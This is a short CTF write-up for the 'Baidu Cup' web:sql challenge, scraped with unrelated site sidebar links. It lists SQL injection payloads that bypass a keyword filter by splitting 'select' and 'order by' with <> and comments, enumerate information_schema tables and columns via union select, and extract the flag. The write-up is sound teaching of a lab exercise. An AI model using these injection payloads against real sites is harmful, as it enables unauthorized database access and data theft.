当前位置:网站首页>"Baidu Cup" CTF competition in September, web:sql
"Baidu Cup" CTF competition in September, web:sql
2022-07-05 13:12:00 【Part 02】
Topic content :
The author will tell you that this is an injection , Don't leave if you feel like it !
see URL
/index.php?id=1
Test filtration
No filtering : ' Space #
Filtered : order by,select
Test whether you can bypass
/**/
1 ord/**/er by 3%23
<>
1 ord<>er by 3%23 With echo
1 ord<>er by 4%23 No echo
?id=-1 union sel<>ect 1,2,3%23
?id=-1 union sel<>ect 1,database(),3%23
?id=-1 union sel<>ect 1,table_name,3 from information_schema.tables where table_schema=database()%23
?id=-1 union sel<>ect 1,column_name,3 from information_schema.columns where table_schema=database()%23
?id=-1 union sel<>ect 1,flAg_T5ZNdrm,3 from info%23
边栏推荐
- Put functions in modules
- 碎片化知识管理工具Memos
- Notion 类笔记软件如何选择?Notion 、FlowUs 、Wolai 对比评测
- 潘多拉 IOT 开发板学习(HAL 库)—— 实验7 窗口看门狗实验(学习笔记)
- Yyds dry goods inventory # solve the real problem of famous enterprises: move the round table
- Principle and performance analysis of lepton lossless compression
- Reverse Polish notation
- SAP UI5 DynamicPage 控件介绍
- Simple page request and parsing cases
- Flutter InkWell & Ink组件
猜你喜欢
爱可生SQLe审核工具顺利完成信通院‘SQL质量管理平台分级能力’评测
go 数组与切片
Datapipeline was selected into the 2022 digital intelligence atlas and database development report of China Academy of communications and communications
SAE international strategic investment geometry partner
SAP SEGW 事物码里的 ABAP 类型和 EDM 类型映射的一个具体例子
山东大学暑期实训一20220620
【每日一题】1200. 最小绝对差
简单上手的页面请求和解析案例
蜀天梦图×微言科技丨达梦图数据库朋友圈+1
It's too convenient. You can complete the code release and approval by nailing it!
随机推荐
LB10S-ASEMI整流桥LB10S
前缀、中缀、后缀表达式「建议收藏」
Natural language processing from Xiaobai to proficient (4): using machine learning to classify Chinese email content
Lb10s-asemi rectifier bridge lb10s
Halcon template matching actual code (I)
Natural language processing series (I) introduction overview
APICloud Studio3 API管理与调试使用教程
数据湖(七):Iceberg概念及回顾什么是数据湖
Introduction to the principle of DNS
Rocky basics 1
Reflection and imagination on the notation like tool
ASEMI整流桥HD06参数,HD06图片,HD06应用
JPA规范总结和整理
Changing JS code has no effect
关于 SAP UI5 floating footer 显示与否的单步调试以及使用 SAP UI5 的收益
《2022年中国银行业RPA供应商实力矩阵分析》研究报告正式启动
There is no monitoring and no operation and maintenance. The following is the commonly used script monitoring in monitoring
初次使用腾讯云,解决只能使用webshell连接,不能使用ssh连接。
Reverse Polish notation
解决uni-app配置页面、tabBar无效问题